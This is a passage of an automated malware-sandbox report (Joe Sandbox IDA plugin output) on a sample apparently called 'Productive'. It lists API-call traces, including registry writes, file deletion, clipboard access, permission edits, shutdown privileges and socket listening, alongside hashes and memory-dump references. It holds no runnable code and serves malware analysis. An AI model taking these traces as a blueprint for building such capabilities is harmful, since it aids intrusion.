                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3222323430-0
                                                                                                                                                                • Opcode ID: 9b58ae09e0164b4f9363ab38045c3b2372f13e98315576cc8137803c36eb01ba
                                                                                                                                                                • Instruction ID: d5ddd2d7c0712ffa67fe67bb0be6fbded152ef647aa4175d255cc3564506814e
                                                                                                                                                                • Opcode Fuzzy Hash: 9b58ae09e0164b4f9363ab38045c3b2372f13e98315576cc8137803c36eb01ba
                                                                                                                                                                • Instruction Fuzzy Hash: F651B135314211ABD306EF60EC8AF6E73ACEF85B40F010529F656DA1E2DF70E9148B62
                                                                                                                                                                APIs
                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00330FB3
                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00340980,00000000,?,00000000,?,?), ref: 00331021
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00331069
                                                                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003310F2
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00331412
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0033141F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                • API String ID: 536824911-966354055
                                                                                                                                                                • Opcode ID: 95b43338543ec3c427eeef626c51ca1ac20548797c4f5f16d5e08edb4bfdb49a
                                                                                                                                                                • Instruction ID: b50a3435c82f823ddbcde8c37d42f1f9f52ac4165dced58f68818f3805fac2dc
                                                                                                                                                                • Opcode Fuzzy Hash: 95b43338543ec3c427eeef626c51ca1ac20548797c4f5f16d5e08edb4bfdb49a
                                                                                                                                                                • Instruction Fuzzy Hash: C50256752106029FCB15EF25C881E6AB7E5FF89714F04895DF88A9B2A2CB30ED11CF91
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,77898FB0,?,00000000), ref: 0031F5F9
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0031F637
                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0031F651
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0031F669
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031F674
                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0031F690
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0031F6E0
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0036B578), ref: 0031F6FE
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0031F708
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031F715
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031F727
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                • String ID: *.*$S1
                                                                                                                                                                • API String ID: 1409584000-3586310290
                                                                                                                                                                • Opcode ID: c2cb2ec6e0f67d0e5ad3d9a854409081d95336807ce108bba3d7f45e428111ba
                                                                                                                                                                • Instruction ID: f5163407b64ed50d2d5d54c04fbdce74dcf4cefbff3404f6a0a7064f37d5b8dd
                                                                                                                                                                • Opcode Fuzzy Hash: c2cb2ec6e0f67d0e5ad3d9a854409081d95336807ce108bba3d7f45e428111ba
                                                                                                                                                                • Instruction Fuzzy Hash: 7931B4756402196FDB1ADBB4DC4DADE77AC9F0E361F104165E904D61E0DF70DE84CA60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00308E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00308E3C
                                                                                                                                                                  • Part of subcall function 00308E20: GetLastError.KERNEL32(?,00308900,?,?,?), ref: 00308E46
                                                                                                                                                                  • Part of subcall function 00308E20: GetProcessHeap.KERNEL32(00000008,?,?,00308900,?,?,?), ref: 00308E55
                                                                                                                                                                  • Part of subcall function 00308E20: HeapAlloc.KERNEL32(00000000,?,00308900,?,?,?), ref: 00308E5C
                                                                                                                                                                  • Part of subcall function 00308E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00308E73
                                                                                                                                                                  • Part of subcall function 00308EBD: GetProcessHeap.KERNEL32(00000008,00308916,00000000,00000000,?,00308916,?), ref: 00308EC9
                                                                                                                                                                  • Part of subcall function 00308EBD: HeapAlloc.KERNEL32(00000000,?,00308916,?), ref: 00308ED0
                                                                                                                                                                  • Part of subcall function 00308EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00308916,?), ref: 00308EE1
                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00308931
                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00308965
                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00308976
                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 003089B3
                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003089CF
                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 003089EC
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003089FB
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00308A02
                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00308A23
                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00308A2A
                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00308A5B
                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00308A81
                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00308A95
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1795222879-0
                                                                                                                                                                • Opcode ID: 14bd09439389f4947f57ae477ac47d0c8d7598fd29ac1f159271d8db9701e68f
                                                                                                                                                                • Instruction ID: f9fc4afd3de7b714de8e253f7be35f31d46e9a17dfe5d2fd319c6b2f7f46ead5
                                                                                                                                                                • Opcode Fuzzy Hash: 14bd09439389f4947f57ae477ac47d0c8d7598fd29ac1f159271d8db9701e68f
                                                                                                                                                                • Instruction Fuzzy Hash: ED614775A01209EFDF06DFA5DC55AEEBB79FF04300F04822AE955AB290DB319A04CB60
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,77898FB0,?,00000000), ref: 0031F756
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0031F7B1
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031F7BC
                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0031F7D8
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0031F828
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0036B578), ref: 0031F846
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0031F850
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031F85D
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031F86F
                                                                                                                                                                  • Part of subcall function 00314875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00314890
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                • String ID: *.*$j1
                                                                                                                                                                • API String ID: 2640511053-2045975141
                                                                                                                                                                • Opcode ID: b90698b2cccc434af60aba12e4cedba954d2c702f20759794c92ac00dfc6f853
                                                                                                                                                                • Instruction ID: 6e38578d1b8dd33a004a7641d0dc01fd15cc01d3450e7aaa210de39ed0bfbe54
                                                                                                                                                                • Opcode Fuzzy Hash: b90698b2cccc434af60aba12e4cedba954d2c702f20759794c92ac00dfc6f853
                                                                                                                                                                • Instruction Fuzzy Hash: 7F31E5766006197FDB1ADBB4DC48AEE77AC9F0E320F110175E904E61E0DB70DE85CA60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0033147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0033040D,?,?), ref: 00331491
                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00330B0C
                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00330BAB
                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00330C43
                                                                                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00330E82
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00330E8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1724414362-0
                                                                                                                                                                • Opcode ID: 515d6866cd7c9e81a5376aa1c30c9e7a1750d713d5db9fad924f77324773ccf1
                                                                                                                                                                • Instruction ID: 4f6a46f1a2802c4c16acc83dd5173de4ad7157139223aefb2ad63ec99a622fa9
                                                                                                                                                                • Opcode Fuzzy Hash: 515d6866cd7c9e81a5376aa1c30c9e7a1750d713d5db9fad924f77324773ccf1
                                                                                                                                                                • Instruction Fuzzy Hash: 78E15E31204211AFC719DF24C991E6ABBE9EF89714F04896DF84ADB2A2DB30ED11CB51
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0031CDD0
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031CE24
                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0031CE49
                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0031CE60
                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0031CE87
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileTime$FindLocal$CloseFirstSystem
                                                                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                • API String ID: 3238362701-2428617273
                                                                                                                                                                • Opcode ID: 8f26944cee62d68d55d665a178c236903d85ca7b276df689daa945329e4fddfb
                                                                                                                                                                • Instruction ID: a0249eda27dcb8849143e0dfae97d11df1c85925aadda3521569c4ad39b0bb43
                                                                                                                                                                • Opcode Fuzzy Hash: 8f26944cee62d68d55d665a178c236903d85ca7b276df689daa945329e4fddfb
                                                                                                                                                                • Instruction Fuzzy Hash: 2DA13DB1414205ABC715FBA4C886EAFB7ECAF95704F40091AF585C6192EB30EA59CB62
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002C2A58,?,00008000), ref: 002D02A4
                                                                                                                                                                  • Part of subcall function 00314FEC: GetFileAttributesW.KERNEL32(?,00313BFE), ref: 00314FED
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00313D96
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00313E3E
                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00313E51
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00313E6E
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00313E90
                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00313EAC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                • API String ID: 4002782344-1173974218
                                                                                                                                                                • Opcode ID: d0235b788f63a14af599f6843b6da3b22726fe5e207eaa170269cc31346711ba
                                                                                                                                                                • Instruction ID: 120d3d68bcb95a5e91b3ecf6fff0feaefffd98f2e756ed39267aeeb18845c42e
                                                                                                                                                                • Opcode Fuzzy Hash: d0235b788f63a14af599f6843b6da3b22726fe5e207eaa170269cc31346711ba
                                                                                                                                                                • Instruction Fuzzy Hash: 1751A73580115D9ACF1AEBA0C993EEDB779AF16300F200259E441B7192DF316F59CFA1
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                                • Opcode ID: dac7ba10db507c42f7e83eb6cf92fe7c662c54cc8e2a2e832c0f3b97e4809680
                                                                                                                                                                • Instruction ID: 0f964c88adc6b28b83742d33c496d25a9580f5e23c6e3dab67ffa7c95555b31b
                                                                                                                                                                • Opcode Fuzzy Hash: dac7ba10db507c42f7e83eb6cf92fe7c662c54cc8e2a2e832c0f3b97e4809680
                                                                                                                                                                • Instruction Fuzzy Hash: 22219C353152219FDB17AF20EC49B6E77ACEF45721F018419FA0A9B2A2CB74AD508B94
                                                                                                                                                                APIs
                                                                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00314488
                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00314494
                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 003144A1
                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 003144C1
                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 003144D3
                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 003144E2
                                                                                                                                                                • LockResource.KERNEL32(?), ref: 003144EE
                                                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0031454F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$FindLoadLock$CreateFromIconSizeof
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2263570339-0
                                                                                                                                                                • Opcode ID: 62b9d9a4f94c954b6c27e4e4086e0e5be362e664ada6f02d6ea81aec381142a4
                                                                                                                                                                • Instruction ID: ab3adcff8ea2a13e8dac1bee44bfc8955bc38b407f9397375939220ec8b9bbed
                                                                                                                                                                • Opcode Fuzzy Hash: 62b9d9a4f94c954b6c27e4e4086e0e5be362e664ada6f02d6ea81aec381142a4
                                                                                                                                                                • Instruction Fuzzy Hash: 2931A37560121AABDB1A9F70DD48AFB7BADEF0A301F004815F915D6150EB70E9A0DB60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00309399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003093E3
                                                                                                                                                                  • Part of subcall function 00309399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00309410
                                                                                                                                                                  • Part of subcall function 00309399: GetLastError.KERNEL32 ref: 0030941D
                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 003157B4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                • API String ID: 2234035333-194228
                                                                                                                                                                • Opcode ID: 2993529a9a9fa76c0c7efdaa7a347408716b692d69c50dc6051a517d0d73a720
                                                                                                                                                                • Instruction ID: 256e5efa469dd423f9fb7b34769b9a8eec50dab6df77fce6a7107c3c4d4581d4
                                                                                                                                                                • Opcode Fuzzy Hash: 2993529a9a9fa76c0c7efdaa7a347408716b692d69c50dc6051a517d0d73a720
                                                                                                                                                                • Instruction Fuzzy Hash: 99017B31790712EBE72F6368DC8BBFB725CEB8D740F200029F913DA0D2DA501C808460
                                                                                                                                                                APIs
                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003269C7
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 003269D6
                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 003269F2
                                                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00326A01
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00326A1B
                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00326A2F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279440585-0
                                                                                                                                                                • Opcode ID: c66c2287d764af987ff101bc847b66cd851b78137b8c2800af9b74f835d5f809
                                                                                                                                                                • Instruction ID: 29a4822cc5569891bae44827249f0e54ac01982472583d0a9ffb58bf210690c3
                                                                                                                                                                • Opcode Fuzzy Hash: c66c2287d764af987ff101bc847b66cd851b78137b8c2800af9b74f835d5f809
                                                                                                                                                                • Instruction Fuzzy Hash: 4121D0746002119FCB05EF64D98AB6EB7A9EF49720F118559E956AB3D2CB30AC01CB91
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0031FA83
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0031FB96
                                                                                                                                                                  • Part of subcall function 002B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002B52E6
                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0031FAB3
                                                                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0031FB80
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
